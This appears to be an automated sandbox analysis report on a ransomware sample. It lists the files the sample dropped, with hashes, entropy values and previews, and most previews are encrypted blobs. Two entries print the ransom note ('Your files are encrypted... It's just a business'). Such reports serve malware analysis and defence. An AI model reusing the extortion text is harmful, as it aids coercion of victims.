                            Preview:...S....w............S.[q..3y...........f.0U.7+....-@.BhW1.d4aQ.n...?.=4..N.......%...Q.%.-8K.K..-..... f...i.B?sl.......#...k.P&...*.).j.B{~.e..l....CLa.S2........X...D...+.gL,...*!......Q..U3s&A.bOz.=......b.|0A\.....2]2.... ...9.`..C....j......%....#h.u e.......V..C.*lq.q.L=..I..n....R.R.....h.....oh.L l. .u..#..c...}..0.{.s...g-.~.KA..Qk%...s(W`..'..f...."..$kX`@.:.%..M.......\...gP....U.>..*N.,.;..*yf%..T.|4oH.$.....qjv.jc....x.9e[..5)..I..g........:^.<.....]..L[@8..|u .ro....+8x>..m.0.c..j8. hv..f..^...|...xZe.....R...]..,..M^)9v.JL.L@j.....5h._..Y..+.O.#xF..p...&%U.0-X.Sq ..\4..v.=.h..j.n...U..M..a.....e[aV.....F.'...[G.=...=S|...Fc L4...I|..&.<...#k..=..>..e..:..G......5....>..N....M.@..UI.`....C...T.?...5..y.......k!..3..3d8...Q....3.O..sL....6..2..!.0s..TEMZ^..... .I#..`._.. w.;./..Z.....y.O.bqX..W.,.i....,{....Q...gh.V....".&..'El...'.-.........U.x.M.....{.m../..WM...1.#....Jh.{G3D`f(...I.A..<b.K,h|:.r.4.@.tL..lI@w.....l.g
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.858258646846595
                            Encrypted:false
                            SSDEEP:24:aXj2Ln21ZXAZydgA12nDzqWYgqneyKlGiQacmvlx:azw2TXyyqi2f0JKlhQ6vf
                            MD5:A571D59928750CB4ABF378C13F0A94BB
                            SHA1:5D06E5159CE89F998E33354F8E28EE174CFF6C14
                            SHA-256:AE49DB397143536A8F83B03513DFC46A52DDD2FCDE77630235E7BAD11EAABDB4
                            SHA-512:D72C124235F6DCB6E3D6E37B698BF367008420C5C8434568698F5B5F02C120142AB74243B8D49F063A1CB2BBBDBFFBA88D1D2B2A335F00338EBDF2E6A5F8A593
                            Malicious:false
                            Preview:.R...Xd..3.............b.(.7o..S.p...`V..F...EV..,.FV.7.....}. ....n.;.!...............9.0..F<.@...2G..^...L...4.~..4Y.F.....UT.G.E.uT.....j.r.....x.....(.V.\Hn.Zw_....L..0..1.'......v.V.iR...2...g......B{i..^..b..1..L(..g.P.x..=.P....4....2..\0.......w.$.u .LF@,4.bd...3+t..Y...y..}...J..H..H.uZt..B.]......g.6.x..q.Cs;....C..x...p..s.R.ykn..Ac...A.1.)<...f...............u...9..)......=D..../...r.Q.=.EH...g.hl...f.o..w..u..b(....._\65Q<..r.a. !.R...w........c..W`1ce.X..O.i^[Br ...|..y9....*._..e....z..PUe......a.8XF.`..B|2..=..Q.S.hZH. .~.....d8...X.%..e."..q...Fd8...F...,q.{7.....X.i..].AukX+.`..'.....x..7....$.......O.d..>.l.-.pP{`.;S.]...Mm..._.....~..3.......`.'u'...iQs...oW.......2.Tf....[..+=B...~:n...dV.d..v.f..GW.w..f...z....M.5U2^...t.....>x.m..*...F...C.......YxU...`.../ND]9a..l..f&.p.m.[|%.M.G./..R.a3...<.a....d.=E.KT..%T......X.J.T.q....PQ).I..T....9......N......=..$B:...]...j..eh.z..}..7O.y..d.E......Z.X...&=.....\....L3_....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.859723034979588
                            Encrypted:false
                            SSDEEP:24:sy7QovSTTV7C23lB1iEtajjlhTUk0vtiX8jylGiQacmgZn:sy7LvSvVplDiEtigkUiX8OlhQ6I
                            MD5:7A74BF7B3DE6B08AA14B5BE76D5BA1BD
                            SHA1:0ACAC9E459E6271540D777C5519E6530FD73443B
                            SHA-256:B30DDA87ECF8170A1FFAB4EE3B9994A08E493A8E5C75D73BC1C826EBDD4314AA
                            SHA-512:D7876538998605183B7F5B1AEE82019F44358C3E66125B0334A326DEAC97B206531E07F3843AD3F0A36220360288854E926BABCB7F04A622C23A56BAC0BC32E5
                            Malicious:false
                            Preview:oBPX.......!......H2S.r..u{...g...GC.~*..<.>6..}...bb@_...u.../4.h.P..T..m.OZH..yl..X.... ...-.YU.6$........\.~..7...l...@<mp..U...QJ...T...!j..g.j....JnQo.B;.?..|...G...B.}...t.^......1^Z=Q:}..+*..P...)4....$.B".]}.FY.$.......d.w..s`#....V.pv=z..|F.....bvq3...Q......^.d6e.zX..I|../........z.....'._.7.|7.z.4b.0l.%.xK...>...{z..G...Q...Z.;Po.,.^..{....8..H.p.M.;.'.0.xef)........L..5....C..=1.<kA.y..m...`..M...;..V=.g O..M....I.O@..$q...=...Cgj...F....sYAQ.......`...UZ.......H.tO.dK..0[.1..5.-.._.x...4..@......mHF..&..jo.}|a..*...e@7.q.Y.}.. s.......l.n.%",......<...2.'..g.J[.;..o.K.~......E..3h.:..a...0`[VF..../tZ.R._./.%.J<C...%.....L..b.'5+6..G|......<.....J.......G..8.v.U.!........^^NK.9.....g...+...E.9.L|#.V.U.3q.Y..{)R.%qc.z2..4...pl=...uC......\.1.3.T.9Vf.c.nb)~.........ez.D.{g.....t.O-~.hB.QY.....K.`<'x`.#C....V...BN.......<..._.....2.7..IBRPo.c:.D.......;=.m..]...Mu..|.G.Y..J..<.m.....L..uf.@.......!.....Tca.eG..:..3.o.$.s
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.819999353854099
                            Encrypted:false
                            SSDEEP:24:oZktmtN5TgGPtC0fUhRlFPBHpIHktvoaGnDN78H3lGiQacmKOyl:IkUtN5TgefGjFJOEkNAXlhQ6KOyl
                            MD5:E4EC082B4F3BEB8FF99C62A213DE6C1E
                            SHA1:491034A033EF5387BE2B42870845D1B1A0502939
                            SHA-256:8A56D5C06663F1E5F33E56DD6BBEB7414459B84D25302FC16D65C29BBBF74CCF
                            SHA-512:DF4A8030ABC47C9B9AA9CE5227194D5FFC5E484F85CF347406C4BAB091B225BEEF295AEA4FFCAE093F1F9CE23E0CDBF4F765607BABD4301AF34E8E1BC8B5A98F
                            Malicious:false
                            Preview:.4..<...M.n.[.?..&_..1.......D.[.W.i......Cu.t.'].9.4........|.Y.....>F.8..]... ..A.(a~.....Kd...P.<.T1ZZ"...X....D..Mx...I..t.-.3........w.....t.y..h.*..7...+F....>..`Y.tK.-...31......<c.t.d.t.....x.e...oaG..l..(w.....jS..k.].|@.s..h.z.7.uL...+....Go.Z.....v.> 0...V,.3(..ZI.%K .....Ms.YM.....m...)../...yj(0.,...3w6.*...Hss.).n..Hf..'&N.....$2....T..&......._.9VFh.d....g..xA..6"Rh.Mn.0>2JE....zu.0.. .Z}.;M.+...v....1.q.-.......q6.......... .aY..,.,....I....N...0....#....D.Od..V..-..i.n.D.l.2.{.%.......q......#.'...y.....+0..wXY_....UyH.4..X...D.&....].'......,.......k..cm.....K.....fA%T..X.4j......fd.$....C.@.*9s-.s .......-.+...>.v.T.6sh"...\........K..+Q.x.d.*./7)qf?O.&..../..<..(......7q..h.(..c..n..1W.!..k.B..-.2......+1.......3....\hl(.D.Z.<..c\.Qr.6..q....4i.3i..j.y.L.C..`Tm.e...;...u....3...-%~..s..[n..<]'u.....\.(....W..J..1...g..U.}..+0.4.b.{..3...O)..H3e.B.\U..>%..8r.g.b...Z...._.3.a4..t.x...^.R..x2 .C._21...Dv.m......R~B.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.827527135885627
                            Encrypted:false
                            SSDEEP:24:wK7VAuJ+GzDxvqNUN+yfcFCuarxQVgcUL/nz7LKDNXBjirbSO9XlGiQacm21:wQAuBDpoUh04x2gcULfz6hEb3lhQ6S
                            MD5:32F104219BE7AB874A862B1B2D2485C1
                            SHA1:9BD31EA9CA10DF7C4791A18A1F79E20A51EF1695
                            SHA-256:8C5ECF6FC33D8622F0122BA6CF1D416115C0FDC20F192531D4DD29556940741E
                            SHA-512:DF5AE06D0B088EEADF7E406AD42A0D63C14B9AE98E4E671CD73E91632AF3EB2152F997AE222CE0A013894A6A49004D24B402224A8B3D9E805C766E0F9A89C63D
                            Malicious:false
                            Preview:.%...P........Z..~..<A.p..i.....+.P.y.#.NbJ..Y._.P..LSm.4:.............@.7g".B.`d..+.O..;.b..z.1C..x..............74..Q...Ul...v\.1C..F.O.;......-?....../P|.!...w.ro.1&*...\.....-eTc..J.B.7...O.....>s.1e`..J...9.P.4U.."....!.?.b7.e......u$.z....|U..?i..(...[..[^X..l.s(..X.~.$*Sq...c.Gzq..:.<...|..........!PH.F.~.z-.....K..,_4..q.;..apc...hx.p..aA........r...[O_.5..V&...5....$.[.........$.......)F U..>.Y$.....Z..T'....."`...2........*..6.S.*.E6.d+.......k.......J..f>~A!......M...J.K.....KgOz.....{>C...`N.;>*R.....%@yv#.....fq...Rw....DrGT..fx..]@`..\-3.Ml...r.M.S.....q.<=........'.-........8.."m.....G..G......W6iN..;..S.d*.I..v./.qO..a4..:......T..7.......$.w......).n./..".R...t..1n.Mn ....9P.1eMGw..|.M/;.;;.%..w.~....hbS.(l_..9..l.1uS..X.`.L@2..(.r-.\..H.......8cE.{.-...v.......N7.....y.....q]hJ\.P~.DN....g...<.s.1.._.E...w(...x...W........)..w...s*K..R.l....c..Oj.g.,....).Gc.e....].Ee.P8{,J.s8.dW.H......-..|0..P*.2.4=..c...|
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.851028830161601
                            Encrypted:false
                            SSDEEP:24:N1u74u+MhK6BQ4y9QfOTsu+garT4Wm8tFgWdHZulGiQacmBl7t:N1u7JTry9Q6su+nviqZulhQ6Bl7t
                            MD5:5F11FB3C36E88E68F0369842AF740F6F
                            SHA1:C085EB504AB5E840EEADDD2E68E7BCA6D0030C58
                            SHA-256:BAE18F9EAA92A9055C2D30E075375031587B5CEE5CA43B01719D59C8782525AF
                            SHA-512:7CDB304C478FE26E75267A38DEE1E1C0EF69A0862A2AB233C9F44D63785962728920B909F54992749A214D27C208A530F2B4AF3389908F164839E1606C5E2984
                            Malicious:false
                            Preview:...g=..C.w.Xu...A...J.% .J..e..<+.=.f.I...(U..Uk.8...p.|Y.GU.#e..mz.......L..xE`.$r..g..../Q...J. .....o..I.}W..t..x.(.....bs}....:..9.w=..F.....!3.KI.5...\k.*.N7wo..u..1{U;...K(qX..5..a>E.d..3wq|.$d'...y...4..@R.4.....)...[.$,.|.N.\.)\......5=.{.T...*..vZ3...t*..K^y..x..P.:..M....N........O.C>..<C.!"OvM...&9.G..$.tV.....T%..Jo|q..p........Xo..c....K.x.G..:\.+..v...-@?..K......D.k....K...-e./A..#..?....#D*..1.+.9l..^..c`..@63.!.+%....5......b....[...i1E.4A.[\.$4.}.HX.O~M.W.......(....O U...E.tG. .e..%.7.v.a...^.A...-d$x..Y.z.........lk.... .46.j.....y........3....%[..q.3..l...V..J.....*Z.-...+;/k.4j>>..`.OH ...d......&.[.b.8.pX.1..v.L.GS.1.....h.8.......DN.o..@...o.m.g..rs.=.....N>...,5.9.H...#J..r$.l,.g.n..&{./..2.7.....&h<U...B..G. Zm9{...|s&g..C.T_o..7.)..g.n..w/..N..r"<[...ml...O.vg...c.....^.+.....y.Y[....TL.........#.{.k.K;~...r.S.#.ZK..S._... J{x^.\G..M....n...@...j..g.}/..!.Q...O~O..._..b....I...$%x}..2..sL......F7....#.(..3.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.832380570834964
                            Encrypted:false
                            SSDEEP:24:qmWXTZ84sXlmEdcMBcppBljcloXna2pXb1lGiQacmdiUE:qlXV84sXd9cppAaN11lhQ64T
                            MD5:00BC164FEF48C13C29A7ED489C18EA10
                            SHA1:6EEE10F38D69FB1DE740687FB76E51F637E4B89F
                            SHA-256:9AB3FBEE6EA52889E6A9E788749CA609519A970A8DA508E2B4C635749D6D8031
                            SHA-512:B0C2D2C0831082415DDBFBE8CF3EFC0DC8A2BC3C959350F142475EE670CF2D1F5FB0801F1BB9B28BFDCCAC9C8DA228E7F84CE71377589F6C8465F8E9919FE2E5
                            Malicious:false
                            Preview:K..W6...w....M..wtnM&_:....T..P....>"3"C.M...s....Y...[.._$..e.....2...(........X..]F....Op*....e......m$W....3.S...1O]..........!....xz.+..)Y...w=....e.r.q.6......+E.ER.u,..2Q)......].........0.....~.N......6.......j.(.RD]3..,2..R...[.L.Z...d..Q...H..y.p.....q5.z1}............P.M...l}$&rsyf..A..c.g.y}.....o...RTY...o.r...]....YY.....^:....3.E...>.%...Wz.{)'.....#.?@9Fj./.....7..._4..E.R.b....o!..8.j.i....E.q.b....Y...../N...n'/z'l....S.c..f4.m.o...OC.>...........$.o..A......0@.>.a....h..!...+....U9.ut"..H9.....1T...|&....j..(.......+;...9.zX.D...lp../.\..x.}.0..Az..n<.....=........R.o2..\....u......FF6..w..v...z..}...v....9..G..oZ....G.9........$.qh.~..$)..l.tI..0_.GBY.f.R.k......C._..P..<...n).^..Y..X......|.].qQ?(c$.w.;g.=.X+...h..y!...IO....-$q.5M-%8$.g...*&.2..I.4u.2$U.j......a........;.oV.....(12.Z.....!60V.Kz.aD\.B...V.....A......B.=B......+WF.CP..gx.KJ.K..*f<....B.....-....O.........0T#...gPs....n..w.M.&Y..v.......\.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.851508721653764
                            Encrypted:false
                            SSDEEP:24:coPfdLxW64yD8IU4CHIZbewcMtF1lUBkAHRQkSlGiQacmHULu:cWz8yDVUVWKw1j1zA2lhQ6wu
                            MD5:6BB6AA4DAB6182789DC8D87699161280
                            SHA1:B69FFB2A704C5F292E593B54860560EF9FF3DB49
                            SHA-256:0D162BE113ED19AD5987B2EF0C2345F6A08A4AA8A4CE8704A83A0383F93FA00B
                            SHA-512:9A16630E97BBD7365D21BAAAF61B980C7E39A5A6F3FFDBE6628D6D904D2EE26814EBDE3988F339D4789C03413309C47EA63433087C7982739E81F3C0130102E8
                            Malicious:false
                            Preview:...k6x.S~..F......9....8..S.......T}SS..b..a....v5..........X.[.].....S.x...3..9#.7k1w.^-A...F...<...\O.r.z.. (...+1:..~..}.].D.vr/.!. .......f..*...H....~..[.U.`. .V.F3.....O.`.W........F'O.<..O- .~.....5E8....Q...................I.....w..1.cS-.N`.%....Z...`.B...J8.....?.v.o....p2.I...x...e....v./...... /.-........3...K..0.Uf#.H...?:fS.b.Tk..[D..3Iz.;.] .lb......t....$.\.D....:..l..'r.-...N.v.N..B..}...o..B..[8.}.=....Co...m...%/M..M..,.......sS..E..D......$..9I.0`.y1.....~....-Z...:.B9.....S.V..K.G.Y..Y....%..d.}...;...NTYpr...p6LB]..u.2~....T"....^.G.4.).m....@..Z.......qc.i.|'.2.....1...|E...?...\....S.>.4.....A...t.......h...E[.,.........".7.OBo.e.........x.6.......t.R..@.d..#.G.(.....w.../...\Wt.PC.h...\.7p...2...e.w1...<.Sl.G.BU......r-...*P..$...H.[....._..#l..._CP........*..5..e$..!z.+42.h.....z.`..C}_.....Z..h.......%`......4..p..}o...k....3Njd...c...Hzl.wN..R.ZQ."...2.K.T..E.W&+<..F*...I.$JS.8...J......d...^..^c..k{.$.....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.837299354172947
                            Encrypted:false
                            SSDEEP:24:vWL7ODoeXHd15SaVyMGfIMqch2uh3E5eJLqylGiQacmxc:vW7OdSa3uh05eJL3lhQ6xc
                            MD5:AC5782705A865D502072C7B91B22DBB2
                            SHA1:F440CB36ABA01D44FB00B6E1F8DB388F6054C069
                            SHA-256:1130B8CC84E5336B9B9DD6B51AF7F75730088E56C9A7C4728104AC871ABDBA1E
                            SHA-512:08ED72908CB6417847E303805490FFEB09B30EEB21E52C6718D539F7C2F9300731C81F7F8CD8F2E1AA864684969A57FF5829AA66B482062E0C985F48DA51E2E7
                            Malicious:false
                            Preview:].5"JMfH.{.....66i."..L.b.......V0!.:........... .....!....d_..Uz.L.g......T....U.(4J....M..~.g.d.@..ae..yh...u.......!...N..{5.]....hDj...FC:C..*>{.#.....#.......$.7Y..{...!W.d.e.k..?J.}..cUW.d......F\".......h...H.>../.>f..6I.]_.*gs.V-.Q8.?.1..5....6x.-R....i.1D.:a.......|.F../ 9..~>2.. O...D.>......G``.-...S.V..<~.<.0}.L#..m.0>.........+.k.GJ3.=g.%k..oc&..{..<.#...6N..w.O%f.....G.T.1.I5'.f. .h..E"F..x.....v..M^~......w..Y3kZ...m...4e.EY..............b6.~....q..:..q..O.........I|....].y+r._..Y.d3.%.....I...J.z..3[.@.?..Q\(...5.v...;. ....Hc;i_g..^..R.....CN.....+../..R..(.S...c..@uWw...A.....M..r^..d!oV.#...Sj.bp..q/.Ld-7 7g^Lr..Y.+..,.U..\.D..B-..\.I.......YUFG.....:]:&vH....Es...^.I...`8!;*I......x].)..a.hm..l:.zNJ...1..{.#.v ...H,Yk....D[....X....C..8.#...[...I..{qj.Xk;.qU.L....s.oi.x...t.3-l..RC.w.]....j./........4..3..P\...e......|....!....k<..-P.......c..3..1w.Z6..CGT.LY.D....~...X.u...3......-.h.....k.n......iG.d..].....x.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.851934808350225
                            Encrypted:false
                            SSDEEP:24:M4hYUcLSJ+EDj0InIIk/9g9UuAVcblzlDAPfdP9WoVoMwnjlGiQacm4jM:M4hySkED7IIk/6tAVGyfdP9mM8jlhQ67
                            MD5:BE655FEA33B83505E8245CD77991B838
                            SHA1:3A6CED24A9CC30D7A9543F5C80AC009975B0D653
                            SHA-256:169CA4900975ED7EAC624E4EE905B03EA1656CF39D93AF960BC432C6732AD277
                            SHA-512:809D94170202BF2EAC3484D3B9A6E76542DB3CC00D9BB96FC0D9A7FE40237CEE4EDF05A9C1D6ED42E7E6C4B7E4E9324A1803E4877C03AFF8F44927DEE0A2FA86
                            Malicious:false
                            Preview:7....Hh5t.z.....C.gl.d.6.IA.J.Y..s.....Kv..j/...;US.$K........c...w...p.....*...n..qG~zZi^.8...:.;...{Hg.@y......IB..l...2.. _..5.qu....KI.:Y%.5.8pE.;;.......,....:.r.G.0O...EC.M-..b...C.+C&R.Kn~{.gpX[..X...e....I......w...../...N..<8<bMA$g.ZN]2. P5.'.!=...H.?M..@..E2.U..,....w.@....C.h..~.c.-j5.I.c..C..(...Z0.....'....L.CY.p....U...`...J..~..\~...qX.[w4.UzS.<..&.be.Y..c..d._?mx.7...t...S..$,.|..pd...o.,.A.W.}-.._......<_....}.w.6.......|.;.l....,...3x..?.|..F.t.Ki...:J`X.....0rM.w[...e?........x.FS_V....c-...uv...I....8.....z.H.I..(.>.A....Xb.Cc.......z....j....&..Q..(.9E...L...rG.Qk...0[1.t)la..`..5.....xw......{.vN./..w^:....c..G('N.s.{.............z.F..........?>T=.-....Fa...ma........P....(..O.....1...]PQ..kB....+M..c.y9.~G.HV.c.W.. ..]*...U.+....[.n.o.d./...HMs0....... 6.v....k..{4...tg...........<.......qj..{'^._x. .......=.Ou.7!.,V..I9..y.o.G....Y...-......uK.R+.B..eM..ym...'].L.N.r...3.\^...*....0W.`A..p....r..E.U.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.838081055227846
                            Encrypted:false
                            SSDEEP:24:yqV4tQuVxwBOHFzKtlssHkszlYyI5eujm+fCbCEYjcNylGiQacm+5y:NV4bVxwB8OtFzlVI5eujmACbCHj8ylhL
                            MD5:704AF72A007D056589E8C23DE0FF0710
                            SHA1:E62B70ACACD13D22D51E4EBBB2BFE54C2B625E38
                            SHA-256:ED60A83D10B480B7061454FBC1D59E5E86332DA460D003D922521383F0350F67
                            SHA-512:A0334A162CB9C9EEC3BA075941AFFFA38566F074D19643A5708F1618A093EEEA86A661C8C63D321F340F2BDDA5BFB0353197A7C42F755F2294A9CBDD3E998EC8
                            Malicious:false
                            Preview:9.:......O5..,".\..<.;.=.s^.S....,.@n,.Ky.+.......Y..l.OI[..7...bk....b+.U%.K_..;../.y&..1......>==..C.$V..W.<{y..L..Y......d)..w..3\...N.4...x^....;U*.@.P..&.P...{.....7G3KF.En.1Jf)9.>.2)..h..D#~;..? %.&.. =.LHG...a...g]kXIH.v.[e4'4v...N/.....Ok"j.m.. ....Z....=7o.,/..@...o....sQ..5.................L.Y.T+.9[0..|..P..{..=.W...~e.X$.;......{P..S..$....=..._.....3~..k.|.....$...h.~.."VE.O....I^hJ.gw.}S...$W..!. ...K.s.iA.9[..L....|.....$.9..7l..x..Dy.?....H...b...@......;....s......>...9.....N`.q..+S.O.../g............. CV....i.r..)...&.?^...:...5....>...c.f._1..\..Q.+....?....h......w:1.kVbX\.j...C9.Pc......oqt......P.KJ.x......._o.Hi|/.O=.......K...B...$.|.;.....;.S... 8...6@/.c9...K.;5T...{.8..."u.,..*..i@....T|..a>.k.m..f.w.&.8x.Kg.."...'Z.-;..N......N..).`.C..u..w......qL_...+.p......].R..%...\E.....V..Xr.......`hcr@..(..9j..F!T.o....8Hr.m.......j7......$a......cy.J...%.uE..-@lY.F1*...5Lt.P...(....9...B.C....;..o.\...!.....B...d#6...pn
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.861578900949438
                            Encrypted:false
                            SSDEEP:24:HNuqlz3IkrYnxow846T5JIVrh3c2X4Pur53bRszlGiQacmqSrZ:HMqlZYnxAXK3XHJRszlhQ6TZ
                            MD5:00581B688B066480CBC5E3021400C955
                            SHA1:66F0A046A87D6881FD2DF4D4B5CE5FF5A31636B6
                            SHA-256:54608D2A6FB755A6095B8698CB67AAC1C99FAE42D860123570F9A6491B7D257A
                            SHA-512:EE1E5F853C14C3B2FFFD2239E7B5A0F71B85FFBE24F2E241736E28955E44EE6CBE1DCA5B1F573DC8FFF4CF4B1CD0BAA258A411C0E56BA0F5437B26893565A9D2
                            Malicious:true
                            Preview:.......,.5=.1.(vF:.r!.@...R.#$J{-..pKh...K.!.....w......#\...H..d@.............(]./)./.b3...X..8........J....~..'..u..G.K/.......TOn4a...!OXK..d..(....q"E.. .._z..)7xs...)..1I ..p".......%^.o...."H......f^.E.[L.y.....(.....I...w..X..joPm!..'...f.5I..i.(.XA...+7.a.......2......v.5.HO.W}.u..mcA.p..u.....HW.......~Q44.7N`..a.Q...........n.u.1z.QB......,?.....(l.0.V.:U. .v.|..F.9.q_tp.2.h.?...N.@M...4.W.r{..,h....h...Nt.E.....hXC.E.Y.1.4..3b.....#..#.8..s......:.ff............{.3K'..6C..QD..{.^....4.0...>...e0w.....C.A.&v........<.J..UF..MRD...yh.v.....1.H=`.y.Bu.i....F.3..5....).,..)c.....~.....i..f..........8.!..b.&.l..hp....:.a..O.g..K,..:..h.h}...:,..|q.0[Y.....~..G...Z..B.L....`..M..z`....B......$.q-.S....*.Z......[.WL.,S.k4..a.U..Ai.6,N.v(..c...N.B.u].y...o..y..fk."..C..a..uc..e.........>.N...1........G..uqT..e.n.l9j....p..{J.Q.Lz.....w.,5.i............-..b6....h.....z..p..x.O...........4.i.)]58.7k..Q..t..".P..\oA.`...Z..C...s.v..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8392613838367735
                            Encrypted:false
                            SSDEEP:24:vamB2kYO0q623c8UgdvcaVACTdXoCe/ljqoqS2wkaH8qJeQNmlGiQacmQ8:Cm8z8dvccXedeoqKkSPJ3mlhQ6V
                            MD5:597BE704696D045B9ECF05DAA8311AC0
                            SHA1:B3287590A61011933DB096AFC18C2ECD6E388B5A
                            SHA-256:5323286CD3D447C47A1E68998E29194A0004830E2B00F66EE6889DD3ED0F9818
                            SHA-512:987E510C889A8BF1EB29477C7AADD649EC8D343457DD4772C60CC0DEA2018B393718BD54055EFE88E2DDA441210A15BA132818F747B08CB31B6C6EDF229BF36C
                            Malicious:false
